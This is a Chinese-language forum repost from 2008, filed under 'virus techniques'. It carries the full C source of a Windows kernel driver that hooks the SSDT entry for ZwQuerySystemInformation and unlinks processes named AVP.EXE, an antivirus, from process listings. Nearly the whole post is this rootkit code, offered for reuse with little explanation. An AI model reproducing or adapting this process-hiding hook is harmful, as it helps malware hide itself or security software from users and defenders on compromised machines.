HOOK SSDT实现进程隐藏 - [病毒技术]

haidao

管理员

Rank: 9 Rank: 9 Rank: 9

Medal No.1 Medal No.2 Medal No.3 Medal No.4 Medal No.5 Medal No.6 Medal No.7 Medal No.8 Medal No.9 Medal No.10

1^# 大中小发表于 2008-1-27 20:53 只看该作者

HOOK SSDT实现进程隐藏 - [病毒技术]

版权声明：转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://romio64.blogbus.com/logs/6051228.html

/*
##################################################################
HideProc.C

Author :robinh00d[F-13 Lab]
Email :cr4zyexpl0rer_at_gmail.com
HomePage :http://cr4zyexpl0rer.googlepages.com
Last Updated :2006-03-23
个人练习之作，都是几年前的老技术了
基本上是copy别人的代码
通过HOOK SSDT来实现对指定进程的隐藏
windows自带的任务管理器以及PSAPI都是利用ZwQuerySystemInformation
来实现进程的遍历
##################################################################
*/

#include "dbghelp.h"
#include "HideProc.h"
#include "ntddk.h"
#include "stdlib.h"

typedef struct ServiceDescriptorEntry {
   unsigned int *ServiceTableBase;
   unsigned int *ServiceCounterTableBase;
   unsigned int NumberOfServices;
   unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t ;

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable ;

#define SYSTEMSERVICE(_fun) KeServiceDescriptorTable.ServiceTableBase[*(PLONG) ((PUCHAR)_fun +1)]

struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG    WaitTime;
PVOID    StartAddress;
CLIENT_ID    ClientIs;
KPRIORITY    Priority;
KPRIORITY    BasePriority;
ULONG    ContextSwitchCount;
ULONG    ThreadState;
KWAIT_REASON WaitReason;
};

struct _SYSTEM_PROCESSES
{
   ULONG    NextEntryDelta;
   ULONG    ThreadCount;
   ULONG    Reserved[6];
   LARGE_INTEGER CreateTime;
   LARGE_INTEGER UserTime;
   LARGE_INTEGER KernelTime;
   UNICODE_STRING ProcessName;
   KPRIORITY    BasePriority;
   ULONG    ProcessId;
   ULONG    InheritedFromProcessId;
   ULONG    HandleCount;
   ULONG    Reserved2[2];
   VM_COUNTERS    VmCounters;
   IO_COUNTERS    IoCounters;
   struct _SYSTEM_THREADS Threads[1];
} ;

typedef NTSTATUS
(*ZWQUERYSYSTEMINFORMATION)(ULONG SystemInformationCLass,
      PVOID SystemInformation,
      ULONG SystemInformationLength,
      PULONG ReturnLength
) ;

ZWQUERYSYSTEMINFORMATION OriZwQuerySystemInformation ;

NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(IN ULONG SystemInformationClass,
            IN PVOID SystemInformation,
            IN ULONG SystemInformationLength,
            OUT PULONG ReturnLength) ;

VOID HidefileUnload(IN PDRIVER_OBJECT DriverObject) ;
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) ;
NTSTATUS HidefileDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) ;

#ifdef ALLOC_PRAGMA
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, HidefileDispatch)
#pragma alloc_text(PAGE, HidefileUnload)
#endif // ALLOC_PRAGMA

NTSTATUS
HidefileDispatch(
   IN PDEVICE_OBJECT DeviceObject,
   IN PIRP    Irp
   )
{
   Irp->IoStatus.Information = 0;

   Irp->IoStatus.Status = STATUS_SUCCESS;
   IoCompleteRequest(Irp, IO_NO_INCREMENT);

   return STATUS_SUCCESS ;
}

VOID
HidefileUnload(
   IN PDRIVER_OBJECT DriverObject
   )
{
//恢复ZwQuerySystemInformation入口
__asm cli
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = \
OriZwQuerySystemInformation ;
__asm sti

}

/*
##################################################################
自定义的ZwQuerySystemInformation
过滤掉指定的进程
##################################################################
*/

NTSTATUS
NewZwQuerySystemInformation(ULONG SystemInformationCLass,
      PVOID SystemInformation,
      ULONG SystemInformationLength,
      PULONG ReturnLength
)
{
NTSTATUS ntStatus ;
ANSI_STRING ProcName ;

ntStatus = OriZwQuerySystemInformation(SystemInformationCLass, \
         SystemInformation, \
         SystemInformationLength, \
         ReturnLength) ;

//如果执行成功
if (NT_SUCCESS(ntStatus))
{
//如果是SystemProcessedAndThreadsInformation
if (5 == SystemInformationCLass)
{
struct _SYSTEM_PROCESSES *pCurrSP = (struct _SYSTEM_PROCESSES *)SystemInformation ;//当前指针
struct _SYSTEM_PROCESSES *pPrevSP = NULL ;//上一个指针

//遍历进程链表,过滤指定的进程名

while(pCurrSP)
{
   RtlUnicodeStringToAnsiString(&ProcName, &pCurrSP->ProcessName, TRUE) ;

   if ((0 < ProcName.Length) && (255 > ProcName.Length))
   {
   //隐藏AVP的进程
   if (!memcmp(ProcName.Buffer, "AVP.EXE", 11))
   {
   DbgPrint("Can You Find The AVP? ;-)") ;

   //遍历进程链表
   if (pPrevSP)
   {
      if (pCurrSP->NextEntryDelta)//是中间的进程
      {
      pPrevSP->NextEntryDelta += pCurrSP->NextEntryDelta ;
      }
      else//是末尾的进程
      {
      pPrevSP->NextEntryDelta = 0 ;
      }
   }
   else
   {
      if (pCurrSP->NextEntryDelta) //是链表中第一个进程
      {
      (unsigned char *)SystemInformation += pCurrSP->NextEntryDelta ;
      }
      else //是链表中的唯一一个进程
      {
      SystemInformation = NULL ;
      }
   }
   }
   }
   RtlFreeAnsiString(&ProcName);

   pPrevSP = pCurrSP ;

   if (pCurrSP->NextEntryDelta)
   {
   (unsigned char *)pCurrSP += pCurrSP->NextEntryDelta ;
   }
   else
   {
   pCurrSP = NULL ;
   }
}
}
}
return ntStatus ;
}

NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
int    i = 0 ;

DbgPrint("Driver Loaded Success!") ;

for (; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
{
DriverObject->MajorFunction = HidefileDispatch ;
}

DriverObject->DriverUnload = HidefileUnload ;

OriZwQuerySystemInformation = \
      (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) ;
__asm cli
(ZWQUERYSYSTEMINFORMATION) (SYSTEMSERVICE(ZwQuerySystemInformation)) = \
               NewZwQuerySystemInformation ;
__asm sti

return STATUS_SUCCESS ;
}

收藏到：Del.icio.us

Tag：
引用地址：http://www.blogbus.com/public/tb ... 86c315919e95c4d3629

TOP

‹‹ 上一主题 | 下一主题 ››